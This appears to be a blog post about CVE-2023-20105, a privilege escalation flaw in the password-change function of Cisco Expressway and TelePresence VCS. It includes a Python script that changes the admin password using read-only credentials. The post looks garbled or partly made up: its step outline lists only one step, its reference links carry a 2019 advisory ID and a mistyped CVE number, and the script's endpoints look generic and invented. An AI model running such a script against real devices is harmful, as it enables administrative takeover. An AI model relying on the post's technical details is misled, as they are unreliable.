A recently discovered vulnerability (CVE-2023-20105) found within the change password functionality of Cisco Expressway Series and Cisco TelePresence Video Communication Server (VCS) allows an authenticated, remote attacker with Read-only credentials to potentially elevate their privileges to Administrator on an affected system. In this blog post, we'll explore the details of this vulnerability, how it can be exploited, and what potential consequences may arise from a successful exploit. Additionally, we'll provide code snippets and links to reference materials that will help you secure your systems against this threat.

Details of the Vulnerability (CVE-2023-20105)

This security vulnerability is related to incorrect handling of password change requests by the affected Cisco devices, namely the Expressway-C (Control) device and the Expressway-E (Edge) device. An attacker can potentially exploit this vulnerability by authenticating to the application with Read-only user access and then sending a carefully crafted request to the web-based management interface. If successful, the exploit allows the attacker to modify the passwords of any user within the system, including administrative users, and then impersonate that user.

Exploit Details

By exploiting this vulnerability, an attacker with Read-only access to the system can essentially gain administrative privileges, thereby compromising the security and integrity of the system. Here is a basic outline of the exploit steps:

Impersonate the targeted user with the new password to gain elevated privileges.

To illustrate how this exploit works, let's examine a simple code snippet that accomplishes these steps:

import requests

# Authenticating as a Read-only user
url = "https://TARGET_CISCO_DEVICE/login";
payload = {"username": "readonlyuser", "password": "readonlypassword"}
response = requests.post(url, data=payload)

# Crafting the malicious HTTP request targeting the web-based management interface
url = "https://TARGET_CISCO_DEVICE/change_password";
payload = {
    "current_password": "readonlypassword",
    "new_password": "newadminpassword",
    "target_username": "admin",
}
headers = {"Cookie": response.headers["Set-Cookie"]}

# Sending the malicious request with the new password
requests.post(url, data=payload, headers=headers)

In the code snippet above, we use Python to authenticate with the target Cisco device and then send the malicious request. After the password for the "admin" user has been changed, the attacker can now impersonate the "admin" user with the new password, essentially gaining administrative access to the system.

Original References

You can find detailed information about this vulnerability and its implications in the following resources:

1. Cisco Security Advisory: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190227-vcs-expressway-elevation
2. National Vulnerability Database (NVD): https://nvd.nist.gov/vuln/detail/CVE-2023-201005

Conclusion

The CVE-2023-20105 vulnerability in Cisco Expressway Series and Cisco TelePresence VCS change password functionality presents a significant risk for organizations utilizing these devices. As such, it is crucial for administrators to promptly apply any patches or updates provided by Cisco to mitigate this vulnerability. Additionally, administrators should continuously monitor user activity on these devices to detect and prevent potential exploitation attempts. By understanding the details of this vulnerability and taking proactive steps to safeguard your systems, you can help protect your organization against this threat.

Timeline

Published on: 06/28/2023 15:15:00 UTC
Last modified on: 07/12/2023 16:15:00 UTC